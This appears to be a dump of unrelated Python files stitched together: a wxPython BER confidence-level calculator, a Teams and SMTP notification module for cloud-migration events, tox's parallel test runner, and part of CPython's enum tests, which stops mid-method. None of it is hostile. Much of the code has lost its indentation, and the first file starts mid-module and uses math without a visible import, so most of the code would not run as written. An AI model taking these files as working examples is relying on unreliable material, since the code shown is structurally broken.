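def ber_confidence_level(ber, n_bits, n_errors):
    """Confidence level that the true BER is below `ber` after observing
    `n_errors` errors in `n_bits` transmitted bits."""
    poisson_tail = sum(math.pow(n_bits * ber, k) / math.factorial(k)
                       for k in range(n_errors + 1))
    return 1.0 - math.exp(-n_bits * ber) * poisson_tail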
class panel_Calculator(wx.Panel):
def __init__(self,*args,**kwargs):
wx.Panel.__init__(self,*args,**kwargs)
self.sizer=wx.GridBagSizer(hgap=10,vgap=5)
self.sizer.Add(wx.StaticText(self,-1,r'BER Confidence Level Calculator'),pos=(0,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.sizer.Add(wx.StaticText(self,-1,r'Specified BER (BERs)'),pos=(1,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_ber=wx.TextCtrl(self,-1,"1e-16",size=(50,-1))
self.sizer.Add(self.txt_ber,pos=(1,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
        self.sizer.Add(wx.StaticText(self,-1,r'Datarate in bits per second (BPS)'),pos=(2,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_bps=wx.TextCtrl(self,-1,"4.8e9",size=(50,-1))
self.sizer.Add(self.txt_bps,pos=(2,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
        self.sizer.Add(wx.StaticText(self,-1,r'Number of measured bit errors (E)'),pos=(3,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_error=wx.TextCtrl(self,-1,"0",size=(50,-1))
self.sizer.Add(self.txt_error,pos=(3,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
        self.sizer.Add(wx.StaticText(self,-1,r'Measurement time (T)'),pos=(4,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_time=wx.TextCtrl(self,-1,"2000",size=(50,-1))
self.sizer.Add(self.txt_time,pos=(4,1),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.sizer.Add(wx.StaticText(self,-1,r'in units of:'),pos=(4,2),flag=wx.ALIGN_CENTER_VERTICAL)
sampleList = ['Seconds', 'Minutes', 'Hours']
self.u_choice = wx.ComboBox(self,-1,'Hours',(740,18),(80,20),sampleList, wx.CB_DROPDOWN)
self.sizer.Add(self.u_choice,pos=(4,3),flag=wx.ALIGN_CENTER_VERTICAL)
self.btn_run = wx.Button(self, 20, "Calculate", (20, 100))
self.btn_run.SetToolTip("Run Analysis...")
self.sizer.Add(self.btn_run,pos=(5,0),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL)
        self.sizer.Add(wx.StaticText(self,-1,r'Number of transmitted bits (N=BPS*T)'),pos=(6,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_N=wx.TextCtrl(self,-1,"",size=(100,-1))
self.sizer.Add(self.txt_N,pos=(6,1),span=(1,2),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
        self.sizer.Add(wx.StaticText(self,-1,r'BER confidence level (CL*100%)'),pos=(7,0),flag=wx.ALIGN_CENTER_VERTICAL)
self.txt_CL=wx.TextCtrl(self,-1,"",size=(100,-1))
self.sizer.Add(self.txt_CL,pos=(7,1),span=(1,2),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
jpg_file = wx.Image('eqn_ber_cl.jpg', wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.sizer.Add(wx.StaticBitmap(self, -1, jpg_file, (10 + jpg_file.GetWidth(), 5), (jpg_file.GetWidth(), jpg_file.GetHeight())),pos=(8,0),span=(1,1),flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
self.SetSizer(self.sizer)
self.sizer.Add(wx.StaticText(self,-1,r'Reference: JitterLabs website of "BER Confidence-level Calculator".'),pos=(9,0),span=(1,4))
self.sizer.Add(wx.StaticText(self,-1,r'Link: https://www.jitterlabs.com/support/calculators/ber-confidence-level-calculator'),pos=(10,0),span=(1,4))
def get_setting(self):
res={}
res["BER"]=self.txt_ber.GetValue()
res["BPS"]=self.txt_bps.GetValue()
res["T"]=self.txt_time.GetValue()
res["U"]=self.u_choice.GetSelection ()
res["E"]=self.txt_error.GetValue()
return res
class panel_version(wx.Panel):
def __init__(self,*args,**kwargs):
wx.Panel.__init__(self,*args,**kwargs)
self.sizer=wx.GridBagSizer(hgap=10,vgap=5)
        self.sizer.Add(wx.StaticText(self,-1,'Version 0.1: Initial Release'),pos=(0,0))
self.sizer.Add(wx.StaticText(self,-1,'yanbin_c@hotmail.com'),pos=(1,0))
self.SetSizer(self.sizer)
self.sizer.Fit(self)
        self.Fit()
if __name__ == "__main__":
app = wx.App()
frame=MyFrame()
frame.Show()
app.MainLoop()
|
notification.py
|
#!/usr/bin/env python3
import logging
import re
import smtplib
import time
from abc import ABC
from email.message import EmailMessage
from threading import Thread
from typing import List, Dict
import pymsteams
import validators
from mf import BRAND
from mf.utils import EnvironmentVariableFetcher
class SendEventDecider:
"""
Makes decision on whether or not a Notification should be sent.
Takes a whitelist and a blacklist. The following rules are applied:
- Blacklisted events are never sent
    - If the whitelist is not empty, ONLY whitelisted events are sent
    - If both the whitelist and the blacklist are empty, all events are sent
"""
_whitelist: List[str] = None
_blacklist: List[str] = None
def __init__(self, whitelist: List[str], blacklist: List[str]):
self._whitelist = whitelist
self._blacklist = blacklist
def should_send(self, event_name: str):
if event_name in self._blacklist:
logging.getLogger('root').debug("{}: Event “{}” would be sent but it is blacklisted.".format(
self.__class__.__name__, event_name
))
return False
if len(self._whitelist) > 0 and event_name not in self._whitelist:
logging.getLogger('root').debug("{}: Event “{}” would be sent but it is not whitelisted.".format(
self.__class__.__name__, event_name
))
return False
return True
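# Hedged usage sketch for SendEventDecider (event names and lists are
# illustrative only):
#
#     decider = SendEventDecider(whitelist=['ReplicationDone'],
#                                blacklist=['AgentInstalled'])
#     decider.should_send('AgentInstalled')    # False: blacklisted
#     decider.should_send('TestTargetsReady')  # False: not in the non-empty whitelist
#     decider.should_send('ReplicationDone')   # True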
class CanNotify(ABC):
""" Interface for classes that can notify """
def get_name(self):
pass
def notify(self, event: str, message: str):
pass
class NotifierBag:
""" Data class containing all available Notifiers """
_bag: Dict[str, CanNotify] = {}
def add(self, notifier: CanNotify):
self._bag[notifier.get_name()] = notifier
def get(self, notifier_name: str):
if notifier_name not in self._bag:
return None
return self._bag[notifier_name]
def get_all(self):
return self._bag
class Notifier:
""" Handles all kind of notifications """
AGENT_INSTALLED = 'AgentInstalled'
ESTIMATION_DONE = 'EstimationDone'
POST_LAUNCH_SCRIPTS_UPDATED = 'PostLaunchScriptsUpdated'
REPLICATION_DONE = 'ReplicationDone'
TEST_TARGETS_READY = 'TestTargetsReady'
CUTOVER_TARGETS_READY = 'CutoverTargetsReady'
AGENT_INSTALLED_MESSAGE = 'The CloudEndure agent is now installed for the server {} in the {} project.'
ESTIMATION_DONE_MESSAGE = '{}'
    POST_LAUNCH_SCRIPTS_UPDATED_MESSAGE = 'The post launch scripts have been copied to the servers of the {} project.'
REPLICATION_DONE_MESSAGE = 'The initial replication for all the servers in the {} project is done.'
TEST_TARGETS_READY_MESSAGE = 'Test targets of the {} project are up and running.'
CUTOVER_TARGETS_READY_MESSAGE = 'Cutover targets of the {} project are up and running.'
ALL_EVENTS = {
AGENT_INSTALLED: AGENT_INSTALLED_MESSAGE,
POST_LAUNCH_SCRIPTS_UPDATED: POST_LAUNCH_SCRIPTS_UPDATED_MESSAGE,
REPLICATION_DONE: REPLICATION_DONE_MESSAGE,
TEST_TARGETS_READY: TEST_TARGETS_READY_MESSAGE,
CUTOVER_TARGETS_READY: CUTOVER_TARGETS_READY_MESSAGE,
ESTIMATION_DONE: ESTIMATION_DONE_MESSAGE,
}
_notifier_bag: NotifierBag = None
_enabled_notifiers: List[str] = []
def __init__(self, config: dict):
# Don't forget to add any new Notifier implementation to the Notifier bag.
# This is because we don't have a dependency injection framework
self._notifier_bag = NotifierBag()
self._notifier_bag.add(TeamsNotifier(config[TeamsNotifier.NAME]))
self._notifier_bag.add(SMTPNotifier(config[SMTPNotifier.NAME]))
self._notifier_bag.add(NullNotifier())
self._enabled_notifiers = config['enabled_notifiers']
def notify(self, event: str, message: str):
if event not in self.ALL_EVENTS:
logging.getLogger('error').error(
                '{}: “{}” is not an authorized event. Cancelling notifications.'.format(self.__class__.__name__, event)
)
return
self._do_notify(event, message)
def _do_notify(self, event: str, message: str):
tasks = []
for notifier_name, notifier in self._notifier_bag.get_all().items():
if notifier_name not in self._enabled_notifiers:
continue
task = Thread(target=notifier.notify, args=[event, self._clean_message(message)])
task.start()
tasks.append(task)
for task in tasks:
task.join()
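    # Hedged note: _do_notify fans out one Thread per enabled notifier and then
    # joins them all, so a slow SMTP server delays only the overall call and
    # cannot block the Teams webhook (or vice versa).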
@classmethod
def _clean_message(cls, message: str) -> str:
# Remove bash formatting
        return re.sub(r'\[.*?;?.*?m', '', message, flags=re.MULTILINE)
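# Hedged example of _clean_message (the input is illustrative): the regex
# strips the bracketed portion of bash colour codes, e.g. the '[0;32m' and
# '[0m' in '\x1b[0;32mReplication done\x1b[0m', so notifiers receive the plain
# text (any bare escape bytes that precede the brackets are left untouched).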
class NullNotifier(CanNotify):
""" Dummy Notifier that does nothing (example) """
NAME = 'null'
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
logging.getLogger('root').debug("{}: Notify “{}” with message: “{}”.".format(
self.__class__.__name__, event, message
))
        # Allows testing concurrency
time.sleep(0.1)
class TeamsNotifier(CanNotify):
""" Handles notification to Microsoft Teams """
NAME = 'teams'
_webook_urls: List[str] = []
_send_event_decider: SendEventDecider = None
def __init__(self, config: dict):
self._webook_urls = config['webhook_urls']
self._send_event_decider = SendEventDecider(config['event_whitelist'], config['event_blacklist'])
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
if not self._send_event_decider.should_send(event):
return
if len(self._webook_urls) > 10:
logging.getLogger('root').warning(
'{}: More than 10 webhooks were configured. Be cautious of rate limits.'.format(
self.__class__.__name__)
)
tasks = []
for webhook_url in self._webook_urls:
            if not validators.url(webhook_url):
                logging.getLogger('error').error(
                    '{}: “{}” is not a valid URL. Skipping it.'.format(self.__class__.__name__, webhook_url)
                )
                continue
task = Thread(target=self._do_notify, args=[webhook_url, message])
task.start()
tasks.append(task)
for task in tasks:
task.join()
def _do_notify(self, webhook_url: str, message: str):
logging.getLogger('root').debug("{}: Sending message: {}\n to: {}".format(
self.__class__.__name__, message, webhook_url
))
teams_connector = pymsteams.connectorcard(webhook_url)
teams_connector.text(message)
teams_connector.send()
class SMTPNotifier(CanNotify):
""" Handles notification by email with SMTP """
NAME = 'smtp'
_destination_emails: List[str] = []
_send_event_decider: SendEventDecider = None
_needs_authentication: bool = None
_username: str = None
_password: str = None
_host: str = None
_port: int = None
_tls: bool = None
def __init__(self, config: dict):
self._needs_authentication = self._get_config_value(config, 'needs_authentication', False)
self._host = self._get_config_value(config, 'host', '127.0.0.1', 'MF_NOTIFIER_SMTP_HOST')
self._port = self._get_config_value(config, 'port', 465, 'MF_NOTIFIER_SMTP_PORT')
self._tls = self._get_config_value(config, 'tls', True, 'MF_NOTIFIER_SMTP_TLS')
self._destination_emails = self._get_config_value(config, 'destination_emails', [])
self._event_whitelist = config['event_whitelist']
self._event_blacklist = config['event_blacklist']
self._send_event_decider = SendEventDecider(whitelist=self._event_whitelist, blacklist=self._event_blacklist)
if self._needs_authentication:
self._username = EnvironmentVariableFetcher.fetch(['MF_NOTIFIER_SMTP_USERNAME'], '[Notify SMTP] Username')
self._password = EnvironmentVariableFetcher.fetch(
env_var_names=['MF_NOTIFIER_SMTP_PASSWORD'],
env_var_description='[Notify SMTP] Password',
sensitive=True
)
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
if not self._send_event_decider.should_send(event):
return
if not self._check_destination_emails():
return
email_message = EmailMessage()
email_message.set_content(message + "\n\nThis message was sent by {}.".format(BRAND))
email_message['Subject'] = '[' + BRAND + '] ' + message
email_message['To'] = ', '.join(self._destination_emails)
if self._needs_authentication:
email_message['From'] = self._username
else:
email_message['From'] = BRAND
if not self._tls:
smtp_client = smtplib.SMTP(self._host, self._port)
else:
smtp_client = smtplib.SMTP_SSL(self._host, self._port)
if self._needs_authentication:
smtp_client.login(self._username, self._password)
logging.getLogger('root').debug("{}: Sending SMTP message: {}".format(
self.__class__.__name__, str(email_message)
))
smtp_client.send_message(email_message)
smtp_client.quit()
@classmethod
def _get_config_value(cls, config: dict, key: str, default, env_var_name: str = None):
value = None
if key not in config or config[key] is None or config[key] == '':
if env_var_name is not None:
value = EnvironmentVariableFetcher.fetch(
env_var_names=[env_var_name], env_var_description=env_var_name)
else:
value = config[key]
if not value:
return default
return value
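    # Hedged summary of the fallback order above: a non-empty value in the
    # config dict wins; otherwise the named environment variable (when given)
    # is consulted; anything still falsy collapses to the supplied default,
    # e.g. port 465 unless the config or MF_NOTIFIER_SMTP_PORT says otherwise.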
def _check_destination_emails(self):
for email in self._destination_emails:
if not validators.email(email):
logging.getLogger('error').error(
'{}: “{}” is not a valid email. Cancelling notifications.'.format(self.__class__.__name__, email)
)
return False
return True
if __name__ == '__main__':
print("This file is a library file. It cannot be called directly.")
|
parallel.py
|
import os
import sys
from collections import OrderedDict, deque
from threading import Event, Semaphore, Thread
from tox import reporter
from tox.config.parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from tox.config.parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from tox.exception import InvocationError
from tox.util.main import MAIN_FILE
from tox.util.spinner import Spinner
def run_parallel(config, venv_dict):
"""here we'll just start parallel sub-processes"""
live_out = config.option.parallel_live
disable_spinner = bool(os.environ.get("TOX_PARALLEL_NO_SPINNER") == "1")
args = [sys.executable, MAIN_FILE] + config.args
try:
position = args.index("--")
except ValueError:
position = len(args)
max_parallel = config.option.parallel
if max_parallel is None:
max_parallel = len(venv_dict)
semaphore = Semaphore(max_parallel)
finished = Event()
show_progress = (
not disable_spinner and not live_out and reporter.verbosity() > reporter.Verbosity.QUIET
)
with Spinner(enabled=show_progress) as spinner:
def run_in_thread(tox_env, os_env, processes):
output = None
env_name = tox_env.envconfig.envname
status = "skipped tests" if config.option.notest else None
try:
os_env[str(PARALLEL_ENV_VAR_KEY_PRIVATE)] = str(env_name)
os_env[str(PARALLEL_ENV_VAR_KEY_PUBLIC)] = str(env_name)
args_sub = list(args)
if hasattr(tox_env, "package"):
args_sub.insert(position, str(tox_env.package))
args_sub.insert(position, "--installpkg")
if tox_env.get_result_json_path():
result_json_index = args_sub.index("--result-json")
args_sub[result_json_index + 1] = "{}".format(tox_env.get_result_json_path())
with tox_env.new_action("parallel {}".format(tox_env.name)) as action:
def collect_process(process):
processes[tox_env] = (action, process)
print_out = not live_out and tox_env.envconfig.parallel_show_output
output = action.popen(
args=args_sub,
env=os_env,
redirect=not live_out,
capture_err=print_out,
callback=collect_process,
returnout=print_out,
)
except InvocationError as err:
status = "parallel child exit code {}".format(err.exit_code)
finally:
semaphore.release()
finished.set()
tox_env.status = status
done.add(env_name)
outcome = spinner.succeed
if config.option.notest:
outcome = spinner.skip
elif status is not None:
outcome = spinner.fail
outcome(env_name)
if print_out and output is not None:
reporter.verbosity0(output)
threads = deque()
processes = {}
todo_keys = set(venv_dict.keys())
todo = OrderedDict((n, todo_keys & set(v.envconfig.depends)) for n, v in venv_dict.items())
done = set()
try:
while todo:
for name, depends in list(todo.items()):
if depends - done:
# skip if has unfinished dependencies
continue
del todo[name]
venv = venv_dict[name]
semaphore.acquire(blocking=True)
spinner.add(name)
thread = Thread(
target=run_in_thread, args=(venv, os.environ.copy(), processes)
)
thread.daemon = True
thread.start()
threads.append(thread)
if todo:
# wait until someone finishes and retry queuing jobs
finished.wait()
finished.clear()
while threads:
threads = [
thread for thread in threads if not thread.join(0.1) and thread.is_alive()
]
except KeyboardInterrupt:
reporter.verbosity0(
"[{}] KeyboardInterrupt parallel - stopping children".format(os.getpid())
)
while True:
# do not allow to interrupt until children interrupt
try:
# putting it inside a thread so it's not interrupted
stopper = Thread(target=_stop_child_processes, args=(processes, threads))
stopper.start()
stopper.join()
except KeyboardInterrupt:
continue
raise KeyboardInterrupt
def _stop_child_processes(processes, main_threads):
"""A three level stop mechanism for children - INT (250ms) -> TERM (100ms) -> KILL"""
# first stop children
def shutdown(tox_env, action, process):
action.handle_interrupt(process)
threads = [Thread(target=shutdown, args=(n, a, p)) for n, (a, p) in processes.items()]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# then its threads
for thread in main_threads:
thread.join()
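# Hedged walk-through of the scheduling loop in run_parallel (env names are
# made up): with envs {'lint': no depends, 'py38': depends on 'lint'}, `todo`
# starts as {'lint': set(), 'py38': {'lint'}}. Only 'lint' has no unfinished
# dependencies, so it is launched first; when run_in_thread adds it to `done`,
# the next pass finds `depends - done` empty for 'py38' and launches it too,
# with the overall concurrency bounded by the `max_parallel` semaphore.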
|
test_enum.py
|
import enum
import inspect
import pydoc
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
try:
import threading
except ImportError:
threading = None
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
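# Note on the two helpers above: they exercise every pickle protocol from 0
# through HIGHEST_PROTOCOL, asserting either a successful round-trip back to
# `target` or the expected exception while dumping.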
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertWarns(DeprecationWarning):
self.assertNotIn(3, Season)
with self.assertWarns(DeprecationWarning):
self.assertNotIn('AUTUMN', Season)
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_member_contains(self):
self.assertRaises(TypeError, lambda: 'test' in self.Season.AUTUMN)
self.assertRaises(TypeError, lambda: 3 in self.Season.AUTUMN)
self.assertRaises(TypeError, lambda: 'AUTUMN' in self.Season.AUTUMN)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_format_enum_custom(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
